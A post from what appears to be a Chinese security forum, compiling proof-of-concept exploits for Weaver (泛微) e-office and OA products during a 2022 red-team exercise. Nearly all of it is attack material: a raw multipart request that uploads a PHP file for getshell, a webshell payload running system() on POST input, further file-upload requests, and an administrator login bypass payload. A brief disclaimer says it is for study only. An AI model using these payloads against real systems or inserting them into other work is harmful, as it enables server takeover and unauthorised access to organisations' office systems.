请选择 进入手机版 | 继续访问电脑版

DecoyMini 技术交流社区

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
查看: 5678|回复: 0

[2022HW] 泛微漏洞 PoC 整理

[复制链接]

177

主题

34

回帖

30

荣誉

Rank: 9Rank: 9Rank: 9

UID
2
积分
343
精华
1
沃币
2 枚
注册时间
2021-6-24

论坛管理

发表于 2022-8-4 10:17:44 | 显示全部楼层 |阅读模式
本文内容为互联网上收集,禁止用于非法用途,仅供学习使用!

1、泛微 eoffice10 前台 getshell


eoffice10/version.json

  1. <form method='post'
  2. action='http://XXXXXXXX:8010/eoffice10/server/public/iWebOffice2015/OfficeServer.php'
  3. enctype="multipart/form-data" >
  4. <input type="file" name="FileData"/></br></br>
  5. <input type="text" name="FormData" value="1"/></br></br>
  6. <button type=submit value="上传">上传</button> </form>
复制代码

shell http[:]//XXXXXXXX:8010/eoffice10/server/public/iWebOffice2015/Document/test.php

  1. POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1
  2. Host: XXXXXXXX:8010
  3. Content-Length: 378
  4. Cache-Control: max-age=0
  5. Upgrade-Insecure-Requests: 1
  6. Origin: null
  7. Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJjb5ZAJOOXO7fwjs
  8. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
  9. Gecko) Chrome/91.0.4472.77 Safari/537.36
  10. Accept:
  11. text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/
  12. *;q=0.8,application/signed-exchange;v=b3;q=0.9
  13. Accept-Encoding: gzip, deflate
  14. Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
  15. Connection: close
  16. ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs
  17. Content-Disposition: form-data; name="FileData"; filename="1.jpg"
  18. Content-Type: image/jpeg
  19. <?php echo md5(1);?>
  20. ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs
  21. Content-Disposition: form-data; name="FormData"
  22. {'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'test.php'}
  23. ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs--
复制代码

2、泛微 E-office do_excel.php 任意文件写入漏洞


URL:

  1. /WWW/general/charge/charge_list/do_excel.php
复制代码

Payload:

  1. html=<?php system($_POST[pass]);?>
复制代码

3、泛微 OA uploaderOperate.jsp 文件上传


/workrelate/plan/util/uploaderOperate.jsp 存在文件上传漏洞

  1. POST /workrelate/plan/util/uploaderOperate.jsp HTTP/1.1
  2. Host: X.X.X.X
  3. Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="101", "Google Chrome";v="101"
  4. Sec-Ch-Ua-Mobile: ?0
  5. Sec-Ch-Ua-Platform: "macOS"
  6. Upgrade-Insecure-Requests: 1
  7. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like
  8. Gecko) Chrome/101.0.4951.64 Safari/537.36
  9. Accept:
  10. text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/
  11. *;q=0.8,application/signed-exchange;v=b3;q=0.9
  12. Sec-Fetch-Site: none
  13. Sec-Fetch-Mode: navigate
  14. Sec-Fetch-User: ?1
  15. Sec-Fetch-Dest: document
  16. Accept-Encoding: gzip, deflate
  17. Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
  18. Connection: close
  19. Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK
  20. Content-Length: 393
  21. ------WebKitFormBoundarymVk33liI64J7GQaK
  22. Content-Disposition: form-data; name="secId"
  23. 1
  24. ------WebKitFormBoundarymVk33liI64J7GQaK
  25. Content-Disposition: form-data; name="Filedata"; filename="testlog.txt"
  26. Test
  27. ------WebKitFormBoundarymVk33liI64J7GQaK
  28. Content-Disposition: form-data; name="plandetailid"
  29. 1
  30. ------WebKitFormBoundarymVk33liI64J7GQaK—
复制代码

/defaultroot/officeserverservlet 确认为历史漏洞 (文件上传)

将文件放至网站根路径下,在数据包中将 fileid 替换

  1. POST /OfficeServer HTTP/1.1
  2. Host: X.X.X.X
  3. Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="101", "Google Chrome";v="101"
  4. Sec-Ch-Ua-Mobile: ?0
  5. Sec-Ch-Ua-Platform: "macOS"
  6. Upgrade-Insecure-Requests: 1
  7. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like
  8. Gecko) Chrome/101.0.4951.64 Safari/537.36
  9. Accept:
  10. text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/
  11. *;q=0.8,application/signed-exchange;v=b3;q=0.9
  12. Sec-Fetch-Site: none
  13. Sec-Fetch-Mode: navigate
  14. Sec-Fetch-User: ?1
  15. Sec-Fetch-Dest: document
  16. Accept-Encoding: gzip, deflate
  17. Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
  18. Connection: close
  19. Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK
  20. Content-Length: 207
  21. ------WebKitFormBoundarymVk33liI64J7GQaK
  22. Content-Disposition: form-data; name="aaa"
  23. {'OPTION':'INSERTIMAGE','isInsertImageNew':'1','imagefileid4pic':'20462'}
  24. ------WebKitFormBoundarymVk33liI64J7GQaK—
复制代码

4、泛微 OA 0day 管理员任意登录


URL:

  1. /mobile/plugin/VerifyQuickLogin.jsp
复制代码

Payload:

  1. identifier=1&language=1&ipaddress=
复制代码

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|小黑屋|DecoyMini 技术交流社区 ( 京ICP备2021005070号 )

GMT+8, 2024-6-23 00:34 , Processed in 0.059100 second(s), 26 queries .

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表